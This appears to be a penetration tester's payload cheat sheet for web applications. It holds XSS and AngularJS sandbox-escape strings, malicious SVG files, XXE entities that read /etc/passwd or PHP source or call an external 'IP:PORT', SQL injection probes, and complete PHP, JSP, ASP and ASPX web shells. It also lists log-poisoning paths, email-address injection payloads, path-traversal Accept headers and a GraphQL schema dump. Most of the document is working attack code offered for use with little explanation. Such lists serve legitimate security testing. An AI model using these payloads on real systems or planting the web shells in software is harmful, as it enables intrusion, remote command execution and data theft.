Payloads

Web application pentesting

Cross-Site Scripting (XSS) payloads

Short XSS payloads in general: (source)

<iframe src=//url.rs>
<script/src=//url.rs>
<x/oncut=alert(1)>a
<svg onload="alert(1)" <="" svg=""

XSS via SSTI (or CSTI)

{{constructor.constructor('alert(document.domain)')()}}

AngularJS very short payload: (source)

{{[]."-alert`1`-"}}

Sourced from Portswigger:

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{!ready && (ready = true) && (
      !call
      ? $$watchers[0].get(toString.constructor.prototype)
      : (a = apply) &&
        (apply = constructor) &&
        (valueOf = call) &&
        (''+''.toString(
          'F = Function.prototype;' +
          'F.apply = F.a;' +
          'delete F.a;' +
          'delete F.valueOf;' +
          'alert(1);'
        ))
    );}}
{{
    {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf; 
    $eval('x=alert(1)//'); 
}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 

  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}
{{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 
    $eval('x=alert(1)//'); 
}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} 
{{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type='UnaryExpression';
    astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
    astNode.argument={type:'Identifier',name:'foo'};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
    $eval('a(b.c)');[].push.apply=a;
}}

URL based XSS smuggling

Via portswigger

<script>throw onerror=eval,name</script>
<script>throw onerror=eval,'/*'+location</script>
<svg onload="throw top.onerror=eval,'/*'+URL">
<body onload="throw onerror=eval,'/*'+location">

XSS via PDF

Via PDF file (sandboxed):

PayloadAllthePDF

XSS via SVG

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("xss via svg");
  </script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
  "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg width="200"
       height="200"
       zoomAndPan="disable"
       xmlns="http://www.w3.org/2000/svg"
       xmlns:xlink="http://www.w3.org/1999/xlink"
       xml:space="preserve">
    <!-- Script linked from the outside-->
    <script xlink:href="https://your-urls-here" />
    <script>
      //<![CDATA[
        alert("ble");
      ]]>
    </script>
  </svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert('xss via svg')">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>

XXE injection

Externally loading in a dtd file, which would result in SSRF

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://IP:PORT"> ]>
<root>
<email>&somename;</email>
<password>yourpassword</password>
</root>

XXE via SVG

Local file inclusion via SVG with XXE injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

Source code disclosure via SVG with XXE injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=yoursource.php"> ]>
<svg>&xxe;</svg>

SQL injection payloads

💡

Will not go into depth how to SQL inject. Finding errors and validations is what we want.

Check for errors with the following parameters:

'
"
#
;
)
--
-- -
/*
`)
`
,
/* */

File Upload

Web shells

Web shell via PHP with interactive ?cmd=command:

<?php system($_REQUEST['cmd']); ?>

Directly execute a command via PHP payload:

<?php system('id'); ?>

Web shell via JSP file upload:

<%@ page import="java.util.*,java.io.*"%>
<%
// webshell
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

Web shell via ASP:

<%
Dim oS, oSNet, oFSys, oF, szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")
If szCMD <> "" Then
  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """", 0, True)
  Response.Write szTF
  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F", 0, True)
  Set oF = oFSys.OpenTextFile(szTF, 1, False, 0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type="text" name="C" size="70" value="<%= szCMD %>">
  <input type="submit" value="Run">
</FORM>
<PRE>
Machine: <%= oSNet.ComputerName %><BR>
Username: <%= oSNet.UserName %><BR>
<%
If IsObject(oF) Then
  On Error Resume Next
  Response.Write Server.HTMLEncode(oF.ReadAll)
  oF.Close
  Call oS.Run("win.com cmd.exe /c del " & szTF, 0, True)
End If
%>

Web shell via ASPX

<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.Web.Services;
using System.IO;
using System.Diagnostics;
[WebService(Namespace="")]
[WebServiceBinding(ConformsTo=WsiProfiles.BasicProfile1_1)]
public class New_Process:Process{public New_Process(string s){}}
public class Service:WebService{
  [WebMethod]
  public string Test(string Z1,string Z2){
    var c=new ProcessStartInfo(Z1,Z2){
      UseShellExecute=false,
      RedirectStandardOutput=true,
      RedirectStandardError=true
    };
    var e=new New_Process("x"){StartInfo=c};e.Start();
    var o=e.StandardOutput;var r=e.StandardError;e.Close();
    var R=o.ReadToEnd()+r.ReadToEnd();
    var resp=HttpContext.Current.Response;
    resp.Clear();
    resp.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
    resp.Write("<data><![CDATA[");
    resp.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D");
    resp.Write("]]></data>");
    resp.End();
    return R;
  }
}

MIME-Type filters

FiletypeFirst bytesData
PNG89 50 4E 47 0D 0A 1A 0A‰PNG␍␊␚␊
JPEG/JPGFF D8 FF DBÿØÿÛ
GIF47 49 46 38 37 61GIF87a / GIF89a
PDF25 50 44 46 2D%PDF-

Signatures wikipedia

Content-Types

A small list for used content-types:

Content-TypeDescription
text/htmlHTML documents
application/javascriptJavaScript files
image/svg+xmlSVG vector images
image/pngPNG images
image/jpegJPEG images
application/xmlXML data
application/jsonJSON data

Log Poisioning

/var/log/apache2/error.log
/var/log/apache2/access.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log

# PHP
/var/lib/php/sessions/sess_YOURSESSIONCOOKIE

# Other
/proc/self/eviron
/proc/self/fd/{bruteforce number}
/var/log/sshd.log
/var/log/mail
/var/log/vsftpd.log

Email payloads

Source for the payloads

Attack TypeEmail Address
XSStest+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
Template injection"<%= 7 * 7 %>"@example.com
test+(${{"7"*7}})@example.com
SQLi"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
SSRFjohn.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]
Parameter pollutionvictim&email=attacker@example.com
(Email) Header injection"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

Local File Inclusion

For LFI vulnerabilities in Django, Rails and NodeJS use the following payloads in the Accept: header (source):

Accept: ../../../../../../../../etc/passwd{{
Accept: ../../../../../../../../etc/passwd{%0D
Accept: ../../../../../../../../etc/passwd{%0A
Accept: ../../../../../../../../etc/passwd{%0D{{
Accept: ../../../../../../../../etc/passwd{%0A{{
Accept: ../../../../../../../../etc/passwd{%00
Accept: ../../../../../../../../etc/passwd{%00{{

GraphQL

Dump the database schema without fragments:

__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}